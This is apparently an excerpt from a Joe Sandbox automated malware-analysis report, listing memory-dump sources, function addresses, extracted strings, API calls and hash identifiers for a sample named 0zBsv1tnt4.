Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID: X$X$Y$Y$Z$Z$q$}
API String ID: 0-540668698
Opcode ID: 92023e53b11931f45d32f5ecdcf6ed19e405229557f51b4b8869f4eaeec5f576
Instruction ID: 561e14e5b896fcd999413531ce0c5216ea7d424aed895d281d1d342fbc642080
Opcode Fuzzy Hash: 92023e53b11931f45d32f5ecdcf6ed19e405229557f51b4b8869f4eaeec5f576
Instruction Fuzzy Hash: 14A12A23E087D94ADB1589FC8C542EFAFA25BA6220F5D8779C8F1E73C2D56D49028371

Function 0096747D Relevance: 10.0, APIs: 4, Strings: 1, Instructions: 1238COMMON

Download Yara Rule

Strings

_^]\, xrefs: 009675C5

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID: _^]\
API String ID: 0-3116432788
Opcode ID: 614fbf05d809114065f882bad3f0af09594cf94bcbce64a836cac089cb7c100a
Instruction ID: b344d9c48b16f2ee509b3101760ee22226d8c93c9384ac0238ff2c340ed7054f
Opcode Fuzzy Hash: 614fbf05d809114065f882bad3f0af09594cf94bcbce64a836cac089cb7c100a
Instruction Fuzzy Hash: 5582147151C3518BC724CF28C8917ABB7E1FFC9328F198A6DE8D59B2A5E7348805CB52

Function 00968B1B Relevance: 9.7, Strings: 7, Instructions: 994COMMON

Download Yara Rule

Strings

/, xrefs: 009692BA
_^]\, xrefs: 00969425
_^]\, xrefs: 00968B44
_^]\, xrefs: 00968F25
_^]\, xrefs: 00969115
BVLm, xrefs: 0096902A
_^]\, xrefs: 00968DE5

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID: InitializeThunk
String ID: /$BVLm$_^]\$_^]\$_^]\$_^]\$_^]\
API String ID: 2994545307-2892575238
Opcode ID: b9e8b34db543d342a5e7cb34c6a2956e49f797db8afb8eae0c5187a0e023d6bd
Instruction ID: 1ecdc165a97991a74f4fc597c7ab8c5268df022eb8d260e77f50b8bb501b2faf
Opcode Fuzzy Hash: b9e8b34db543d342a5e7cb34c6a2956e49f797db8afb8eae0c5187a0e023d6bd
Instruction Fuzzy Hash: 533249B161C3418FD7188B388CA177BB7D6FBD2314F299A2DD0D6872A5DB358902CB52

Function 00959310 Relevance: 9.2, Strings: 7, Instructions: 431COMMON

Download Yara Rule

Strings

A, xrefs: 00959698
FM, xrefs: 00959370
WAg., xrefs: 0095943E
cbrn, xrefs: 009593EE
,6.2, xrefs: 00959446
PTvu, xrefs: 009596F3
;"I, xrefs: 0095944E

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID: ;"I$,6.2$A$FM$PTvu$WAg.$cbrn
API String ID: 0-3116088196
Opcode ID: c9e207116f0d0e1d3c010b878aae285ff6d7d53aed98aae9b503113e93668ba5
Instruction ID: 951ab4ba9c6eca4d90e0ac37be4cf5a49f392f6cd7e80a55fceb9d49e9a74265
Opcode Fuzzy Hash: c9e207116f0d0e1d3c010b878aae285ff6d7d53aed98aae9b503113e93668ba5
Instruction Fuzzy Hash: 59C1277160C3D58BE322CF6A94A035BFFD19FD6211F084AACE8D51B386D375890AC792

Function 0095AB40 Relevance: 8.0, Strings: 6, Instructions: 481COMMON

Download Yara Rule

Strings

HYZF, xrefs: 0095AE40
]><, xrefs: 0095AC83
UMAG, xrefs: 0095AEF0
HYZF, xrefs: 0095AE05, 0095B075, 0095B07E
Y2^0, xrefs: 0095AC7B
>, xrefs: 0095AB5E

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID: >$HYZF$HYZF$UMAG$Y2^0$]><
API String ID: 0-2666672646
Opcode ID: 47bd38b51f03fef9e1bc5d141fa514bbf2ec0349e0154284672baeddd9bf49ef
Instruction ID: 3d1e0faa455b6c1970b68ec68fb99c030d80d31b23cb0bb9aac9b99826f92be5
Opcode Fuzzy Hash: 47bd38b51f03fef9e1bc5d141fa514bbf2ec0349e0154284672baeddd9bf49ef
Instruction Fuzzy Hash: B3E16B7674C3504BC324CF7988412AFBBE69FC1305F18892CE9E99B385DA79C90D8786

Function 009781CC Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 593COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 009784BD
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 009785B4

Strings

LF7Y, xrefs: 00978951
_^]\, xrefs: 00978A15

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: LF7Y$_^]\
API String ID: 237503144-3688711800
Opcode ID: 8f8a8ea7401f6f5cb48ac17b18f60e0548de0f36f3f6fcab3b2d8aa738722d41
Instruction ID: 0d45b500f2ed5bfe1218ccd3e24ec68b85f9de799940181dfa84750eaa06615d
Opcode Fuzzy Hash: 8f8a8ea7401f6f5cb48ac17b18f60e0548de0f36f3f6fcab3b2d8aa738722d41
Instruction Fuzzy Hash: 0522F17291D341CFD3248F28D88072FBBE1FF85310F198A6DE999572A1DB319A05CB96

Function 009783D8 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 542COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 009784BD
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 009785B4

Strings

LF7Y, xrefs: 00978951
_^]\, xrefs: 00978A15

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
